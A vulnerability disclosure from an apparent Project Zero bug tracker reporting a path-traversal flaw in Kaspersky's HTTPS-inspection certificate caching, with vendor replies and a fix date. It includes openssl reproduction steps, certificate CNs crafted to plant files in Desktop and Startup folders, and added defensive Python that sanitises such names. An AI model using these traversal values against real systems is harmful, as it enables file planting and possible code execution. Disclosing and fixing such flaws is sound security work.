Status: Fixed
Closed: Nov 2015
Kaspersky Antivirus Certificate handling path traversal
Project Member Reported by taviso@google.com, Sep 18 2015
When Kaspersky https inspection is enabled, temporary certificates are created in %PROGRAMDATA% for validation. I observed that the naming pattern is {CN}.cer.

I created a certificate with CN="../../../../Users/All Users/Start Menu/Startup/foo.bat\x00", browsed to an SSL server presenting that certificate and Kaspersky created that certificate name. Jumping from this to code execution seems quite straightforward. I didn't try it, but it seems quite easy to make some ASN.1/X.509 that is also a valid batch file or some other relaxed-parsing format.

Here is how to generate a certificate to reproduce:


$ openssl req -x509 -newkey rsa:2048 -keyout key.pem -out cert.pem -days 360
Generating a 2048 bit RSA private key
......................................................................+++
...............+++
writing new private key to 'key.pem'
Enter PEM pass phrase:
Verifying - Enter PEM pass phrase:
-----
You are about to be asked to enter information that will be incorporated
into your certificate request.
What you are about to enter is what is called a Distinguished Name or a DN.
There are quite a few fields but you can leave some blank
For some fields there will be a default value,
If you enter '.', the field will be left blank.
-----
Country Name (2 letter code) [AU]:
State or Province Name (full name) [Some-State]:
Locality Name (eg, city) []:
Organization Name (eg, company) [Internet Widgits Pty Ltd]:
Organizational Unit Name (eg, section) []:
Common Name (e.g. server FQDN or YOUR name) []:../../../../../Users/All Users/Desktop/hello
Email Address []:

Then start a test server like this:

$ openssl s_server -key key.pem -cert cert.pem -accept 8080

And then navigate to https://host:8080 from the Windows host, and observe a certificate called hello.cer on the desktop. I attached a screenshot to demonstrate. I can't believe this actually worked; note that it's not necessary to click or interact with anything to produce the file.


This bug is subject to a 90 day disclosure deadline. If 90 days elapse
without a broadly available patch, then the bug report will automatically
become visible to the public.

Attachment: Windows 7 x64-2015-09-18-16-06-39.png (151 KB)
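The report shows what happens when an attacker-controlled CN is used verbatim as a filename. As an added example (not Kaspersky's code and not part of the report), here is how a defender would derive cache filenames so that separators, ".." segments, NUL bytes and a CN-chosen extension can never reach the filesystem; CACHE_DIR is a constructed stand-in for the %PROGRAMDATA% location, and the two traversal CNs from the report are used as test inputs.

```python
import hashlib
import os
import re

# Constructed stand-in for the %PROGRAMDATA% cache location in the report (assumption).
CACHE_DIR = os.path.abspath("cert-cache")

# Allow-list: DNS-style labels only. No separators, no empty labels (so no ".."),
# no NUL, no leading dot and no wildcard '*' (illegal in Windows filenames).
_HOSTNAME_CN = re.compile(r"^[A-Za-z0-9][A-Za-z0-9_-]*(\.[A-Za-z0-9_-]+)*$")
# Windows reserved device names; "CON.cer" would still be treated as the device.
_WIN_RESERVED = {"CON", "PRN", "AUX", "NUL"} | {f"COM{i}" for i in range(1, 10)} \
    | {f"LPT{i}" for i in range(1, 10)}


def is_safe_cn(cn: str) -> bool:
    """True only if the CN can be used verbatim as a filename stem."""
    if len(cn) > 253 or not _HOSTNAME_CN.match(cn):
        return False
    return cn.split(".")[0].upper() not in _WIN_RESERVED


def cert_filename(cn: str) -> str:
    """Filename for a cached certificate. Safe CNs stay readable; anything else is
    replaced by a SHA-256-derived name so untrusted bytes never reach the path.
    The extension is appended here, so the CN can never pick it (e.g. .bat)."""
    if is_safe_cn(cn):
        return cn + ".cer"
    digest = hashlib.sha256(cn.encode("utf-8", "surrogateescape")).hexdigest()
    return "cn-" + digest[:32] + ".cer"


def cache_path(cn: str, base: str = CACHE_DIR) -> str:
    """Join the filename onto the cache dir and verify the result did not escape it."""
    base = os.path.abspath(base)
    path = os.path.abspath(os.path.join(base, cert_filename(cn)))
    if os.path.dirname(path) != base:  # defence in depth; should never trigger
        raise ValueError("derived path escapes the certificate cache")
    return path


if __name__ == "__main__":
    # Constructed inputs: a benign CN plus the two traversal CNs from the report.
    for cn in ("example.com",
               "../../../../../Users/All Users/Desktop/hello",
               "../../../../Users/All Users/Start Menu/Startup/foo.bat\x00"):
        print(repr(cn), "->", cache_path(cn))
```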
Project Member Comment 1 by taviso@google.com, Sep 21 2015
Update from Kaspersky:

Hi Tavis,
 
Thank you for reporting this vulnerability to us! We confirm the bug with Certificate handling path traversal.
We are working on creating a fix. I’ll let you know our fix plan for the bug as soon as we align it internally.
 
Best regards,
Igor
Project Member Comment 2 by taviso@google.com, Oct 9 2015
I believe this issue is scheduled to be fixed today, I'm testing it in a VM now.
Project Member Comment 3 by taviso@google.com, Nov 16 2015
Labels: -Restrict-View-Commit
Status: Fixed
Final fix was released on November 16th.
Comment 4 by athmi...@gmail.com, Nov 24 2015
Hello Tavis,

If possible can you help me with the following:

How were you able to write a .bat file? I am only able to create .cer files. Including the null character '\x00' in the CommonName does not seem to be working. What version of Kaspersky was this tested against?

Comment 5 by athmi...@gmail.com, Nov 25 2015
Also it does not look like the path traversal is fixed on the latest version. Kaspersky is still vulnerable after updating to the latest version.
Comment 6 Deleted